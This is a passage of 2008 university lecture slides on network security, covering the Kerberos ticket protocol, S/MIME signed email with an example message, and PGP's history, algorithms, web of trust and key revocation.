The AS replies with a Ticket Granting Ticket

encrypted with TGS’s key and a session key encrypted with C’s key. (1) Ic, Itgs, N (2) {Itgs,N,kc,tgs}Kc, {Ic,v,Kc,tgs}Ktgs

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

User & Service Authentication

The user types his username and password on his

machine.

The client applies a one-way function (in practice a

hash function) on the password in order to get the cryptographic key Kc.

Server’s keys are random bit-strings.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

C S AS TGS 4 3

Between C and TGS

The client sends the ticket as well as an

authenticator to the TGS.

The ticket contains the session key Kc,tgs.

The TGS uses the session key to verify the

authenticator.

The TGS knows whether C is authorized to access the

server S.

The TGS delivers a ticket to access the service.

(3) Is,N’,{Ic,v,Kc,tgs}Ktgs {Ic,t}Kc,tgs (4) {Is,N’,kc,s}Kc,tgs, {Ic,v,Kc,s}Ks

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Between C and S

C S AS TGS 5 6 The service ticket again contains the client’s identity,

his IP address, a validity period and the session key to be used between the client and server.

The client has also received a copy of the session key,

encrypted with the previous session key.

He sends an authenticator and the ticket to the

server. (5) {Ic,v,Kc,s}Ks, {Ic,t}Kc,s (6) {t+1}Kc,s

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Discussion

It is the client's responsibility to store his

authentication data (the tickets), the servers are stateless.

The authentication server is accessed only once

during the ticket validity (typically 8 hours).

Clients can access services with their tickets even if

the authentication server is down.

Once a client is authenticated, his ticket cannot be

revoked.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Ski Pass Analogy

The developers of Kerberos propose an analogy

between Kerberos and a ski package.

You get a three-pass ski (TGT) from your travel agency

against a proof of identity (and money…).

Then, the three-day ski pass (TGT) can be used at four

different resorts. You show the pass at whichever resort you decide to go (until it expires), and you receive a lift ticket (ST) for that resort.

Once you have the lift ticket (ST), you can ski all you want at

that resort (until it expires).

If you go to another resort later, you once again show the

three-pass ski (TGT), and you get another lift ticket (ST) for the new resort.

S/MIME

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Certificates

S/MIME.

Hierarchical. Users trust a certification authority.

PGP.

Peer-to-peer. Users trust some other users. One or several identities (names, e-mail addresses). One or several signatures per identity.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Mime (Multipurpose Internet Mail Extensions) is a

standard used to represent any object in e-mails or

• ther electronic documents (e.g. HTTP replies).

A Mime document at least contains the following two

headers:

Mime-version. Content-type.

text/plain text/html image/gif video/mpeg multipart/mixed etc.

Mime

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

S/Mime Basics

S/Mime proposed by RSA Security in 1997, S/Mime

now owned by IETF.

S/Mime adds digital signature and encryption to Mime

messages.

S/Mime exclusively uses X.509 certificates, signed

by a certification authority (chain of trust).

Thus, before using S/Mime we have to obtain a

certificate from a CA.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

S/MIME: Principles

• Received: from smtp4.sgsi.ucl.ac.be ([10.1.5.4]) by mmp.sipr-dc.ucl.ac.be for

gildas.avoine@uclouvain.be; Wed, 30 Apr 2008 01:04:21 +0200 (CEST)

• Received: from [192.168.1.2] (45.66-136-217.adsl-dyn.isp.belgacom.be [217.136.66.45]) by

smtp4.sgsi.ucl.ac.be (Postfix) with ESMTP for <gildas.avoine@uclouvain.be>;

• Wed, 30 Apr 2008 01:04:29 +0200 (CEST)
• Date: Wed, 30 Apr 2008 01:04:14 +0200
• From: avoine <gildas.avoine@uclouvain.be>
• Subject: test
• To: gildas.avoine@uclouvain.be
• Message-id: <4817A96E.2030101@uclouvain.be>
• MIME-version: 1.0
• Content-type: multipart/signed; protocol="application/x-pkcs7-signature";
• micalg=sha1; boundary=------------ms070301020000070200060202
• User-Agent: Thunderbird 2.0.0.12 (Windows/20080213)
• This is a cryptographically signed message in MIME format.
• -------------ms070301020000070200060202
• Content-Type: text/plain; charset=ISO-8859-1; format=flowed
• Content-Transfer-Encoding: 7bit
• Hello World!

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

S/MIME: Principles

• Hello World!
• -------------ms070301020000070200060202
• Content-Type: application/x-pkcs7-signature; name="smime.p7s"
• Content-Transfer-Encoding: base64
• Content-Disposition: attachment; filename="smime.p7s"
• Content-Description: S/MIME Cryptographic Signature
• MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIICezC
• AncwggHgoAMCAQICBQCJgWDNMA0GCSqGSIb3DQEBBQUAMCkxFDASBgNVBAoTC1NlbGYtU2ln

(…)

• hvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw
• BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEgYBqlFmpWmAD1er41TC6
• xECUG508seotHJZphg4ueJqfegikYos7gkBLm93hHFOr70gkuvLbqNtMX4ro0I2Jd2iIdfrY
• 03jDIZFKVt5vg1+LGKv/3ZfX1T6kv9+nJU7M8epOcYdP+IJjr6JgyqVGMW95WDyA0sKMOuA2
• /2unjqrgHgAAAAAAAA==
• -------------ms070301020000070200060202--

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

S/MIME: Principles

Hybrid encryption.

What does this mean?

One recipient. Several recipients.

PGP

Basics Public-Key Validity Key Distribution Key Revocation

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

PGP History 1/

PGP = Pretty Good Privacy Several flavors: PGP, PGPi, GPG. PGP.

Published by Philip Zimmermann in 1991. Portable software initially containing classical algorithms

MD5, IDEA, RSA.

First software allowing anybody to completely protect their

documents and messages.

3 years of enquiry and harassment by the American

government

Patented algorithms (RSA patented in the US until 2000). Suspicion of violating export regulations.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

PGP History 2/

1997:

Selling of PGP Inc. to McAffee (Network Associates).

Code no longer public

During the 39th IETF meeting at Munich, Zimmermann and

Callas requested the IETF to setup a working group on the standardization of PGP (OpenPGP [RFC1991, aug 96], [RFC2440, nov 98], [RFC4880, nov 07]).

Richard Stallman at the Individual-Network Betriebstagung at

Aachen requested the European hackers to implement public key softwares (US citizens were not allowed to do so outside us).

2001:

Zimmermann leaves Network Associates. Network Associates abandons PGP.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

2002:

PGP Corporation is created, buys back PGP rights. Code is again public. Free vs Trial download.

Basic functionalities remain available after 30 days. But not the additional functionalities eg disk encryption.

Complete system compliant with OpenPGP.

www.pgp.com Current version: 9.8

PGP History 3/

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

PGP History 4/

PGPi

Developed by Ståle S. Ytteborg

(Norway) to counter the US export regulations.

Maintained from 1997 to 2000. Obtained from the printed source

code of PGP.

MIT Press thus published a book

with the PGP source code.

www.pgpi.org

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

PGP History 5/

GPG

GPG = GnuPG = GNU Privacy Guard. GnuPG is the GNU GPL version of PGP. Initially, used Elgamal

and Blowfish instead of RSA and IDEA.

Follow the Open PGP Standard. Version 0.0.0 released on December 1997. Initially called G10. www.gnupg.org Current version: 2.0 GUI Frontends:

http://www.gnupg.org/related_software/frontends.en.html

Das Briefgeheimnis sowie das Post- und Fernmeldegeheimnis sind unverletzlich. Grundgesetz, Artikel 10, Abs 1. Secrecy of letters as well as sanctity of mail, telephone and telegraph are inviolable. Basic Law, Article 10, Paragraph 1

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

PGP Specialties

Encryption / Signature. Key management.

What is called a PGP key is actually a PGP certificate. Web of trust.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Signed Message Example

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Symmetric Encryption [RFC4880]

TDES [Mandatory]

• Slow. Considered to be secure.

IDEA

Still patented till 2010. Seem to be secure, resisted to all

cryptanalysis for 17 years…

CAST5 (128 bit-key) [should impl. CAST5]

Less studied than the other algorithms.

Blowfish (128 bit-key)

Less studied than the other algorithms.

Twofish (256 bit-key) (AES contest top-5 finalists)

Rather new.

AES (128/192/256 bit-key) [should impl. AES128]

THE standard since 2000.

A l l

• f

t h e m s e e m t

• b

e s e c u r e .

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Public-Key [RFC4880]

Encryption

RSA Elgamal [Mandatory] (randomized encryption)

Signature RSA DSA [Mandatory] Elgamal no longer recommended for signature.

Attack by Phong Nguyen (2003) when Elgamal keys used

for both encryption and signature.

The flaw was exploitable during 4 years…

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Hash Functions [RFC4880]

MD5

Deprecated.

SHA-1 [Mandatory]

Its use should be avoided.

SHA-224/256/384/512

Seem Ok.

RIPEMD-160

Seem Ok.

Tiger

Seem Ok.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Protection of the Private Key

The private key cannot be memorized by the user. How can we protect our private key? It is stored on the hard disk.

Encrypted with from a password (no means to access it

without the user’s collaboration). The password is hashed to generate a symmetric key.

Once decrypted, it is in the computer’s memory (dangerous).

It may be stored on a smart card.

Access to the card is protected by a password. The key never leaves the card, it’s the data that transits

through the card to get encrypted, decrypted or signed.

The passphrase must be as strong as the key (i.e.,

same entropy at least).

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Key Size [Lenstra,Verheul, 01]

3072 99 2048 87 1536 80 1024 71 public key (bits) symmetric key (bits) What should be the minimum passphrase- length (in chars) to protect a 1024-bit RSA private key?

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Public Key Validity

How to be sure that the key we use to encrypt a

message is the correct one.

Directory.

Who did put the key into the directory?

Fake identity associated to the key?

Is the directory a legitimate one?

Face to face, check the ID, check the hash of the

key, sign the key (Why?)

Certificates.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Validity and Trust in PGP

Two important notions in PGP.

Validity: I know that this key belongs to Bob. Trust: I know that Bob does not sign keys arbitrarily.

When we sign a key, we declare its validity.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Validity and Trust in PGP

We can also declare a full or partial trust. A key is valid if the sum of the partial trusts of its

valid signatures is at least 1.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Key Publication

Several PGP key servers exist across the world.

http://pgp.mit.edu/

They contain all keys of all PGP users that want to

publish their key.

If Alice is sure that the key associated to Clara

belongs to Clara, she can sign Clara’s key and re- submit it to the servers.

If Eddy trusts Alice, he can accept Clara’s key.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Key Revocation

How can we revoke a key published on a server? Servers are replicated: withdrawing a key is useless

because another server will duplicate it again.

How can we prove that we are allowed to revoke a key

if we lost it?

We generate a key revocation certificate when we

generate the key. The confidentiality of this certificate is not a major issue.

We put a validity deadline to the key when we

generate it.

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Cryptographic Key Summary

Which keys are involved when Alice sends an

encrypted/signed message to Bob?

Conclusion

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

Conclusion

Symmetric-key crypto or public-key crypto. One Key / One service. Avoid to use the key directly.

Session Key (forward secrecy).

Key generation (Who, How eg issue in PRNGs). Key distribution. Identify the trusted parties. Revocation of the public-keys.

More generally, think about how to react to an attack.

Check the weak link (cf PGP).